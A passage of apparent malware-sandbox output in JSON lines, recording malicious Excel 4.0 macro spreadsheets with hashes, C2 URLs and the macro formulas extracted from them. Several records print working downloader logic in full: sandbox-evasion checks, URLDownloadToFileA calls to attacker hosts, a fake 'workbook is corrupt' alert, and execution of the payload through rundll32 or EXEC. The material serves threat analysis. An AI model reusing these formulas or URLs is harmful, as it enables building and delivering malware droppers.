,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cmgp5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"bzknDT1rej\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a72cab284ca8c696c3a3801e1afccaa4bd5d70d993b557b8f523364c4a48f5a5"},"analysis":{"reported":"2020-04-09T16:18:10Z","score":10},"files":[{"filename":"a72cab284ca8c696c3a3801e1afccaa4bd5d70d993b557b8f523364c4a48f5a5","filesize":112128,"md5":"a363d5239854d1eb983c45fd77e31b2a","sha1":"03061079bb382deff3c0a13e188f0c88b30006a4","sha256":"a72cab284ca8c696c3a3801e1afccaa4bd5d70d993b557b8f523364c4a48f5a5","sha512":"cc67756c74084fc007e96610203fa4eda2ccc3867e21342929035f2b5e600bf5ba6e05d99f5d869b5e8b3ca273612453673cb2c2c4eaa61d565864f64855221a","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a72cab284ca8c696c3a3801e1afccaa4bd5d70d993b557b8f523364c4a48f5a5.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pnxkntdl.xyz/KJSDBViad7"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a73cf72010120d4260b89035c262680ba2053990dd2229b12886e756541b8117"},"analysis":{"reported":"2020-04-09T16:18:10Z","score":10},"files":[{"filename":"a73cf72010120d4260b89035c262680ba2053990dd2229b12886e756541b8117","filesize":104448,"md5":"eb061b8e05912842528f84927327c4e1","sha1":"0ef9d1f24c3ecfe483162716926b14b4b283d011","sha256":"a73cf72010120d4260b89035c262680ba2053990dd2229b12886e756541b8117","sha512":"5833876b1eb35c17c1df36d3604df4db5d8b387cbb4fb50a406235048015fed297259ca08f52de5372a17f409ecedb3842b2c3628fdb5323bff3c288a42a36ab","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a73cf72010120d4260b89035c262680ba2053990dd2229b12886e756541b8117.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["http://wrjmkdod.xyz/KDHBVsd7v8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"pTDOZSZFHM\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$22C$6\u003c770,CLOSE(FALSE),)\nIF(R$23C$6\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a73f85734af8368b9e81a9baa6ba4b24d2a44c6b95331b93ea999fef964b2976"},"analysis":{"reported":"2020-04-09T16:18:10Z","score":10},"files":[{"filename":"a73f85734af8368b9e81a9baa6ba4b24d2a44c6b95331b93ea999fef964b2976","filesize":152576,"md5":"d01d6c791da7567da9c356bd22c985d1","sha1":"6ac1017c9abd5e22f49dd176bca36f00a056ac57","sha256":"a73f85734af8368b9e81a9baa6ba4b24d2a44c6b95331b93ea999fef964b2976","sha512":"84ce98f632fdb66eac2cba8c7a24110787b62eb4fa0fbfbed0752949359482bd53ad1483d19e7d4edc7ff5967ed3ef76818d97b43fabb81b701c4548bb1c42dc","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a73f85734af8368b9e81a9baa6ba4b24d2a44c6b95331b93ea999fef964b2976.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/ajt1eg4fh3a"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/ajt1eg4fh3a\",\"c:\\Users\\Public\\awefwef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\awefwef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"LbRslzds0l\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a75a367232912130d8bb57581ddf9266663290f5e5b9966181ec8e27aa54fdf8"},"analysis":{"reported":"2020-04-09T16:18:10Z","score":10},"files":[{"filename":"a75a367232912130d8bb57581ddf9266663290f5e5b9966181ec8e27aa54fdf8","filesize":142848,"md5":"08205cb83292c277fccde7889baad66d","sha1":"37d7f310c77d27601b36738433a81c35d18bb68f","sha256":"a75a367232912130d8bb57581ddf9266663290f5e5b9966181ec8e27aa54fdf8","sha512":"e34d897bf664cf258cdff52f2152000273292b45336ae52050a26e24ead09ac8b9e81178d1df4654453334c6506377991ca0b01e739c49f593fc9983613462dc","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a75a367232912130d8bb57581ddf9266663290f5e5b9966181ec8e27aa54fdf8.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pjtcdnrd.pw/fsgbfgbfsg43"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"OOv893S7nl\",TRUE)\nRETURN()\nRETURN()\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$20C$11\u003c770,CLOSE(FALSE),)\nIF(R$21C$11\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a75cc15cdaf308487641a7a93232d489e4ac69600f592ceedcaf72fd2006ad5b"},"analysis":{"reported":"2020-04-09T16:18:10Z","score":10},"files":[{"filename":"a75cc15cdaf308487641a7a93232d489e4ac69600f592ceedcaf72fd2006ad5b","filesize":112640,"md5":"e71e596e841c60805ddeca03a84e315d","sha1":"bd907c5e4139c7b2ca934caf55377dc21ba650b9","sha256":"a75cc15cdaf308487641a7a93232d489e4ac69600f592ceedcaf72fd2006ad5b","sha512":"b7b34a62841413d4731c114fdaad97cfc850ad119eac7573630031fbc10d8517f685d89d82492456162d8129bae3ce94ac73f9a0bfd2fd267ab6bbbdf6d63882","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a75cc15cdaf308487641a7a93232d489e4ac69600f592ceedcaf72fd2006ad5b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pnxkntdl.xyz/KJSDBViad7"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a768330f760e491d53eff375206beff2684b445cb5dc54e01b3b15a35324029b"},"analysis":{"reported":"2020-04-09T16:18:10Z","score":10},"files":[{"filename":"a768330f760e491d53eff375206beff2684b445cb5dc54e01b3b15a35324029b","filesize":185344,"md5":"b12988c4699a3ae3b8e530168d2d4d59","sha1":"239f2f50a13b37adbc10351e522ef0564a1def25","sha256":"a768330f760e491d53eff375206beff2684b445cb5dc54e01b3b15a35324029b","sha512":"e50ee42a0b287624cdbe564951472cdae9fa7621f8a914b29d600bf1e452fb849d559268a770c5ca4e82afebe7633cea1f1ffd1ec40d52dca0a75b0066466c1a","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a768330f760e491d53eff375206beff2684b445cb5dc54e01b3b15a35324029b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/DVkjbsdv37"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a7a051b85a3c038ec83c0bc307364e5f9d48290dd82c015736e2feedd158a49c"},"analysis":{"reported":"2020-04-09T16:18:10Z","score":10},"files":[{"filename":"a7a051b85a3c038ec83c0bc307364e5f9d48290dd82c015736e2feedd158a49c","filesize":113664,"md5":"a7e6a9d633515094432193da4a869553","sha1":"fa84f864acddf1564c6d36f84eec9937d8ef42c0","sha256":"a7a051b85a3c038ec83c0bc307364e5f9d48290dd82c015736e2feedd158a49c","sha512":"1cbe7e29de41d2a2d80db00ced8b71f94e0e7cdc228e71d1f1f4f5ce08e0308fb35ed95d738c5d3537999441ab95bf12934d4cd7a266298bdbc6eb92f2c7157c","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a7a051b85a3c038ec83c0bc307364e5f9d48290dd82c015736e2feedd158a49c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://murreeweather.com/wp-content/white/444444.png","http://batilservice.xyz/wp-content/uploads/2020/02/white/444444.png","http://tubolso.cl/wp-content/uploads/2020/02/white/444444.png","http://freespacemarketing.com/wp-content/uploads/2020/02/white/444444.png"],"attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nCALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://murreeweather.com/wp-content/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0)\nIF(R$6C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://batilservice.xyz/wp-content/uploads/2020/02/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0),GOTO(ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)))\nIF(R$7C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://tubolso.cl/wp-content/uploads/2020/02/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0),GOTO(ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)))\nIF(R$8C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://freespacemarketing.com/wp-content/uploads/2020/02/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0),GOTO(ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)))\nIF(R$9C$0\u003c0,CLOSE(FALSE),)\nALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)\nEXEC(\"c:\\Users\\Public\\jkqnrlvkrq.exe\")\nCLOSE(FALSE)\nRETURN()\nWORKBOOK.HIDE(\"uZPOL5iKYu\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a7afa2d4594f0ed168271944444de019c6cf23eaab26e0e70648d9e831f4adbd"},"analysis":{"reported":"2020-04-09T16:18:10Z","score":10},"files":[{"filename":"a7afa2d4594f0ed168271944444de019c6cf23eaab26e0e70648d9e831f4adbd","filesize":168448,"md5":"333088a45d9e4594f94b3a66f067e83c","sha1":"9c7ce3a8e1c50bdd3fb449e4ecf22666bef61a8c","sha256":"a7afa2d4594f0ed168271944444de019c6cf23eaab26e0e70648d9e831f4adbd","sha512":"a83775d954eb5ce3f1ae05b1eef2f9abd205905f74d2b34a60ac412bcaf82d589cdf0e92798cd9e9019a2acd1822e9ae87b0fc89cf005a14b8049864f0c0e64a","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a7afa2d4594f0ed168271944444de019c6cf23eaab26e0e70648d9e831f4adbd.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/bag4hy","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/bag4hy\",\"c:\\Users\\Public\\cogp5yf.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cogp5yf.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cogp5yf.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"qRqZqcybvH\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a7d97a274d4df36cd355f7e0a7756aa922d8d9449d1d708002b3fad520348fc8"},"analysis":{"reported":"2020-04-09T16:18:10Z","score":10},"files":[{"filename":"a7d97a274d4df36cd355f7e0a7756aa922d8d9449d1d708002b3fad520348fc8","filesize":185344,"md5":"d5867f1cad84a51a76616062519334e9","sha1":"2c9ac5c0698bb0723110afec31d73a283df468e1","sha256":"a7d97a274d4df36cd355f7e0a7756aa922d8d9449d1d708002b3fad520348fc8","sha512":"84451c93d28b420058c6fb8662081016732dc88ec0d484b6a2d3709fa5b0b7940dd82802f7ebfeb122a935418333a999ee272c04c82edc1f315fabb7dd14585b","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a7d97a274d4df36cd355f7e0a7756aa922d8d9449d1d708002b3fad520348fc8.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://doolised.xyz/DSBVhsdv78f"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a7dfee564b32ac4641fda5e1cb3d5bfa7daace2e17ea945008899c217432befe"},"analysis":{"reported":"2020-04-09T16:18:10Z","score":10},"files":[{"filename":"a7dfee564b32ac4641fda5e1cb3d5bfa7daace2e17ea945008899c217432befe","filesize":116224,"md5":"f6fb8226ef7302afcaef2fadf38fec20","sha1":"467470def03956f57a199cd6c2850ba1c11920db","sha256":"a7dfee564b32ac4641fda5e1cb3d5bfa7daace2e17ea945008899c217432befe","sha512":"94a847eab524563a3e0396a3dee2b74619b016cdcfc4425db67fe56a2951465303a8df40bf54316026686392c147bee7e2380b4d5cbd597fe31df4aad572bbb7","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a7dfee564b32ac4641fda5e1cb3d5bfa7daace2e17ea945008899c217432befe.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/aaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/aaeg4df12\",\"c:\\Users\\Public\\cwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"Hk6K5DJxwr\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a7e74b40d551ae4946362416ec2c8ba54c0214bd1b71d6fbbf98b2f91a030db1"},"analysis":{"reported":"2020-04-09T16:18:11Z","score":10},"files":[{"filename":"a7e74b40d551ae4946362416ec2c8ba54c0214bd1b71d6fbbf98b2f91a030db1","filesize":116224,"md5":"1c70d42ffa642b30a60d167d96d6c149","sha1":"944426728c50e1d386d947405500114d8e96949c","sha256":"a7e74b40d551ae4946362416ec2c8ba54c0214bd1b71d6fbbf98b2f91a030db1","sha512":"95e05f72756e7e6c804bb05988ee5aab70b2a9c9dab503cacd53cbe63bf7f831832838a6a523f31b92123d403ac36584054d2d812a5d843274a020a28b9803ee","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a7e74b40d551ae4946362416ec2c8ba54c0214bd1b71d6fbbf98b2f91a030db1.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/aaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/aaeg4df12\",\"c:\\Users\\Public\\cwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"TKHI6NoRqh\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a7eb05e8d163dfffc72c89bd5f82de910949e5b9d3e75a6f933fbee969fb72da"},"analysis":{"reported":"2020-04-09T16:18:11Z","score":10},"files":[{"filename":"a7eb05e8d163dfffc72c89bd5f82de910949e5b9d3e75a6f933fbee969fb72da","filesize":152576,"md5":"ebd288af74afc54c2aa6a3196bf2c2c5","sha1":"bf6391e05ae2bf65f7dfc1424d9b70a1952c6163","sha256":"a7eb05e8d163dfffc72c89bd5f82de910949e5b9d3e75a6f933fbee969fb72da","sha512":"0be5dee0047c3566b61888051f529b95da8377dd3cf1f567c97856156daf61402d4ffdeb9867cc35e81b76520643bc99a2e7862eff777f43fe69f00ad4b83ee1","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a7eb05e8d163dfffc72c89bd5f82de910949e5b9d3e75a6f933fbee969fb72da.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/ajt1eg4fh3a"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/ajt1eg4fh3a\",\"c:\\Users\\Public\\awefwef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\awefwef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"B8nZXoCvmg\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a80ffea8750a9747f15847017dfabc1abb61d967c6a8d13a6a910697aab37e7c"},"analysis":{"reported":"2020-04-09T16:18:11Z","score":10},"files":[{"filename":"a80ffea8750a9747f15847017dfabc1abb61d967c6a8d13a6a910697aab37e7c","filesize":155648,"md5":"f7c8d5de2051cfd0b0acb7a5e1e62780","sha1":"263b5e9e49baa9329d63c604836ded51845fd71c","sha256":"a80ffea8750a9747f15847017dfabc1abb61d967c6a8d13a6a910697aab37e7c","sha512":"f9b91fd881ee1926894b9013bb94970fc25f5eeb718f99f706642307746a326da31dbd56c74b7f5e00960326c6d83c2e0267d2d7e6d00087f61b268347cb699e","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a80ffea8750a9747f15847017dfabc1abb61d967c6a8d13a6a910697aab37e7c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"PRODUCT(\"old\",\"Sortation\")\nPRODUCT(R$16C$9,\"Sortation\")\nIF(R$2C$12\u003c7,R$89C$13,R$90C$13)\nSUM(R$2C$15,0.026)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a82653135015581280cf8a4080e68d133c986f8acb4a13d6ce3958e908bdbcb1"},"analysis":{"reported":"2020-04-09T16:18:11Z","score":10},"files":[{"filename":"a82653135015581280cf8a4080e68d133c986f8acb4a13d6ce3958e908bdbcb1","filesize":112128,"md5":"f807778557e1907a05122e330d553e4c","sha1":"07e3dc03b79238221a1b685ac018d71714b878e4","sha256":"a82653135015581280cf8a4080e68d133c986f8acb4a13d6ce3958e908bdbcb1","sha512":"169e8bc4b2e8775a8ad8afb650c20ffe1d1185c79fff47c9c30f3fc2d2ebda1497b85b028bf7b25365cd80be0e3f456896647da88152cef3b818ecd4a8f04176","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a82653135015581280cf8a4080e68d133c986f8acb4a13d6ce3958e908bdbcb1.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pnxkntdl.xyz/KJSDBViad7"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a8285bbb47a888929f1ad552beaf7c223b3d3b6a631e72cb5dfcf8558490e060"},"analysis":{"reported":"2020-04-09T16:18:11Z","score":10},"files":[{"filename":"a8285bbb47a888929f1ad552beaf7c223b3d3b6a631e72cb5dfcf8558490e060","filesize":160768,"md5":"3cdc8332b2ea1b8d57be19c956061f47","sha1":"632c78b366f8609745d58af7c739fa00f63dffc0","sha256":"a8285bbb47a888929f1ad552beaf7c223b3d3b6a631e72cb5dfcf8558490e060","sha512":"658143498a50ae8e588a91908701cb9a75f886842d126e0659f81c0e3a415e08c9768667e5ba5b41df8331eb0bdc572a6c2c8073b14e8c6165dbde936654415e","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a8285bbb47a888929f1ad552beaf7c223b3d3b6a631e72cb5dfcf8558490e060.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/deg34g","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cmgp5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"8ySjyNRZfn\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a83890bbc081b9ec839c9a32ec06eae6f549a0f85fe0a30751ef229a58e440af"},"analysis":{"reported":"2020-04-09T16:18:11Z","score":10},"files":[{"filename":"a83890bbc081b9ec839c9a32ec06eae6f549a0f85fe0a30751ef229a58e440af","filesize":112640,"md5":"b8950f584f821b04370a54090b1ef385","sha1":"5dd0e43b7b8da2c18645622c8d749a52bafb75ec","sha256":"a83890bbc081b9ec839c9a32ec06eae6f549a0f85fe0a30751ef229a58e440af","sha512":"4423515e09aaccd3fdc21e8d050f77980b61c86bdbd8d222e66fb4f44c4fed4907852b5b4ce24e86ec329818cb13cd0ceb6eea07ff2956f25f92d49288611cc8","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a83890bbc081b9ec839c9a32ec06eae6f549a0f85fe0a30751ef229a58e440af.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pnxkntdl.xyz/KJSDBViad7"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a8398bf72949ab0a527a16ff9ca1857a5787b325e075f4be2ebee52c6f48565e"},"analysis":{"reported":"2020-04-09T16:18:11Z","score":10},"files":[{"filename":"a8398bf72949ab0a527a16ff9ca1857a5787b325e075f4be2ebee52c6f48565e","filesize":170496,"md5":"87ea6ea3f6c39bbc20057a3feaede0e6","sha1":"3ffafa7056378ed1f50f0f64e8df7e27a82d2ec7","sha256":"a8398bf72949ab0a527a16ff9ca1857a5787b325e075f4be2ebee52c6f48565e","sha512":"8586e8bd3e439de3a3e428dc3d83660f512cb2b5031ed19b2b5dcc91e38a7c717cb1269f3285df72ac6e220552930fa10fa8c6f27339b26124080ecc14fc0d50","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a8398bf72949ab0a527a16ff9ca1857a5787b325e075f4be2ebee52c6f48565e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule